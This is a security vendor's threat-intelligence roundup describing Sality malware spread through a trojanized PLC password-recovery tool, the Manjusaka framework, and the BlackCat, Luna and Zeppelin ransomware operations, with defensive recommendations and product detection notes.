Our research team compiled the latest updates on newly announced CVEs, recent ransomware attacks including BlackCat & Luna, and IoT security news. They also offer analysis of the potential impacts and their expert recommendations:ICS
Sality Malware Infecting ICS Using a Password Recovery Tool
A threat actor is infecting ICS to create a botnet through password “cracking”
software for PLCs and HMIs. In one incident, the tool exploited CVE-2022-2003 in DirectLogic PLCs from Automation Direct to extract the password and dropped Sality, a piece of malware that creates a peer-to-peer botnet.
Affected Vendors: This recovery tool promises to unlock PLCs and HMIs from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Schneider Electric, Allen Bradley, Weintek, ABB, and Panasonic.
Attack Parameters: The exploit used by the tool can be done over serial-only communications, as well as over Ethernet.
Impact: Sality can terminate processes, open connections to remote sites, download additional payloads, or steal data from the host. It can also inject itself into running processes and copy itself onto network shares, external drives, and removable storage devices that could carry it to other systems.
In this case, it appeared to be focused on stealing cryptocurrency.
Recommendations: Automation Direct has released a patch for the exploited vulnerability.
SCADAfence Coverage: The vulnerabilities exploited in this attack are included in the CVE DB.
Manjusaka Post-Exploitation Attack Framework
A new post-exploitation attack framework, Manjusaka, an alternative to Cobalt Strike, was observed in the wild
Attack Parameters: Manjusaka uses implants written in Rust, while its binaries are written in GoLang. Its RAT implants support command execution, file access, network reconnaissance, and more, so hackers can use it for the same operational goals as Cobalt Strike.
The implant can execute arbitrary commands using “cmd.exe”, get file information, get current network connections, collect browser credentials, take screenshots, obtain system information, and activate the file management module.
The infection chain includes a malicious document that executes to fetch a second-stage payload, Cobalt Strike, and load it in memory. Cobalt Strike is later used to download Manjusaka implants.
The C2 communications are executed via HTTP GET requests.
Impact: Right now, it looks like Manjusaka is tentatively deployed for testing, so its development is likely not in its final phases. However, it is already powerful enough for real-world use.
Recommendations: Track HTTP activity for potential attacks using the User Activity Analyzer.
SCADAfence Coverage: The SCADAfence Platform detects the use of Cobalt Strike. The Scadafence platform also detects command execution via HTTP GET requests and via “cmd.exe”.
BlackCat Attack on European Gas Pipeline
The ALPHV ransomware gang, BlackCat, claimed responsibility for a ransomware attack against Creos Luxembourg S.A., a natural gas pipeline and electricity network operator in the central European country.
Attack Parameters: BlackCat has been observed using multiple tools in their attacks, such as Mimikatz to recover stored passwords. The ransomware exploits the ProxyShell and ProxyLogon vulnerabilities to gain remote access and the ability to execute arbitrary code and commands. This is used for spawning a PowerShell process that downloads a Cobalt Strike beacon.
Impact: The customer portals of Encevo and Creos were unavailable, but there was no interruption in the provided services. The group claims to have exfiltrated roughly 150 Gb of information, including contracts, agreements, passports, bills, and emails.
SCADAfence Coverage: The SCADAfence Platform detects the use of Mimikatz and Cobalt Strike, as well as the exploitation of the ProxyShell vulnerability.
A new ransomware, dubbed Luna, can be used to encrypt devices running several operating systems, including Windows, Linux, and ESXi systems.
Attack Parameters: The ransomware is written in Rust, enabling attackers to port it to multiple platforms and enabling it to evade automated static code analysis attempts.
The ransomware appears to be specifically tailored to be used only by Russian-speaking threat actors.
Impact: Luna confirms the latest trend of developing cross-platform ransomware that use languages like Rust and Golang to create malware capable of targeting multiple operating systems with little to no changes.
SCADAfence Coverage: The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet.
The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
CISA and the FBI released a joint advisory detailing IOCs and TTPs of Zepplin ransomware, a RaaS which encrypts their victim’s files multiple times. The group was also seen using the double-extortion method.
Targets: Zeppelin was observed targeting businesses and critical infrastructure organizations such as defense contractors and technology companies, with a focus on entities from the healthcare and medical industries.
Attack Parameters: The group gains access to victim networks using RDP exploitation, breaching SonicWall firewall vulnerabilities, and phishing campaigns.Zeppelin executed their malware multiple times within a victim’s network, resulting in the creation of different IDs or file extensions, resulting in the victim needing several unique decryption keys.
Impact: Zeppelin actors have been known to request ransom payments in Bitcoin, with initial amounts ranging from several thousand dollars to over a million dollars.
SCADAfence Coverage: RDP connections can be tracked using the User Activity Analyzer.
The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet. The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
Following are additional best practices recommendations to protect against all strains of malware and ransomware:
- Make sure secure offline backups of critical systems are available and up-to-date.
- Apply the latest security patches on the assets in the network.
- Use unique passwords and multi-factor authentication on authentication paths to OT assets.
- Encrypt sensitive data when possible.
- Educate staff about the risks and methods of ransomware attacks and how to avoid infection.
For more information on keeping your ICS/OT systems protected from threats, or to see the SCADAfence platform in action, request a demo now.
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.